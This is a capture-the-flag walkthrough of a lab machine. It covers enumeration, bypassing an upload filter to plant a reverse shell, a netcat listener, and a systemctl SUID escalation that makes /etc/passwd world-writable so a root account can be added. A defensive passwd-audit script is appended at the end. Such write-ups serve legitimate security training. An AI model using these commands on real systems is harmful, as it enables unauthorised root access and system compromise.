Let's start with a basic Nmap scan.
nmap -A -T4 -p- -sC <ip> -oN scan.nmap
Let's begin by enumerating SMB shares.
So it looks like we are denied access! Never mind, we still have other ports to enumerate.
Let's move on to the web server, which is running on port 3333.
Let's see if there are any hidden directories. You can use any tool of your choice; here we use gobuster.
gobuster dir -u http://<ip>:3333/ -w /wordlists
-u specifies the URL.
-w specifies the wordlist (provide the path).
/Internal looks interesting. Let's check it.
Now that we know we can upload a file, let's upload a reverse shell and try to connect back.
Oops!! Looks like it's blocking .php files.
Let's try to bypass the client-side filter by altering the extension. For example, you can try .php5, .php4 or .phtml, and also double extensions like .php.txt, .php.jpg, etc.
You can use netcat to set up a listener.
nc -nvlp <port>
Access the file from the browser and you should get a reverse shell.
You can use the following commands to stabilize the shell.
python -c 'import pty;pty.spawn("/bin/bash")'
For a more stable shell, execute the following commands.
export TERM=xterm //gives us access to terminal commands such as clear
stty raw -echo; fg //run on your own terminal after backgrounding the shell with Ctrl+Z; turns off echo, which gives us tab auto-completion, arrow keys and Ctrl+C.
You can get the user flag, but our intention is to root the box, so are you ready for some cool stuff!? Let's privesc.
So the instructions say there is a file with the SUID bit set that will allow us to escalate privileges.
The SUID bit is a permission set by root which allows a normal user to run the program, but the program executes as root.
We can make use of the find command to search for such files.
find / -perm -u=s -type f 2>/dev/null
Not every file with SUID permission can be used to escalate privileges.
Looks like the systemctl binary can be used. But how do I know? There are some default lists you can check.
How are we going to do this?
systemctl runs unit files, so if we manage to create one of our own and get systemctl to execute it, the commands inside it run as root. Let's do this.
You can refer to GTFOBins.
chmo=$(mktemp).service //creating our environment variable holding the path of a temporary unit file.
echo '[Service]
ExecStart=/bin/bash -c "chmod 777 /etc/passwd"
[Install]
WantedBy=multi-user.target' > $chmo //writing the unit file; ExecStart runs a command to change the permissions of the passwd file.
./systemctl link $chmo //linking the unit file in $chmo
./systemctl enable --now $chmo //enabling and starting it immediately
Now the permissions on /etc/passwd should have changed.
You can use the following command to create a password hash.
openssl passwd -salt 123
Here we are using 123 as the salt.
Upon entering that, you'll be asked for a password; type the password and it'll generate the hash.
Now you can write the new user entry into /etc/passwd as,
new //the name of the user
hash //the password hash
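From the defender's side, what this writeup leaves behind (a second UID 0 account carrying its own hash directly in /etc/passwd, in a file that was just made world-writable) is easy to audit for. The following added example, not part of the original writeup, checks passwd-format text for exactly those traces; the sample content and the hash in it are constructed.

```python
"""Audit /etc/passwd for planted root accounts and loosened permissions.

Added example (not the writeup's own code): reports entries with UID 0 that are
not 'root', entries carrying a password hash in field 2 instead of the 'x'
placeholder, empty passwords, and a world-writable file mode (e.g. after
chmod 777). SAMPLE_PASSWD below is constructed test data."""
import os
import stat

# Constructed sample: a normal root line, two normal accounts, and a planted
# entry of the shape 'new:<hash>:0:0::/root:/bin/bash'. The hash is fake.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bill:x:1000:1000:bill:/home/bill:/bin/bash
new:$1$123$AbCdEfGhIjKlMnOpQrStU.:0:0::/root:/bin/bash
"""


def audit_passwd_content(text):
    """Return a list of (line_no, reason) findings for suspicious entries."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((n, f"extra UID 0 account '{name}'"))
        if pw == "":
            findings.append((n, f"empty password for '{name}'"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Hashes belong in /etc/shadow; a hash here is a classic planted account.
            findings.append((n, f"password hash stored in passwd for '{name}'"))
    return findings


def world_writable(path):
    """True if the file mode grants write to 'other', as chmod 777 does."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


if __name__ == "__main__":
    for n, reason in audit_passwd_content(SAMPLE_PASSWD):
        print(f"line {n}: {reason}")
    if os.path.exists("/etc/passwd"):
        print("/etc/passwd world-writable:", world_writable("/etc/passwd"))
```

Run as root on a live host it prints findings for the real file; pair it with the SUID search from the writeup (find / -perm -u=s) to catch both the entry point and the foothold.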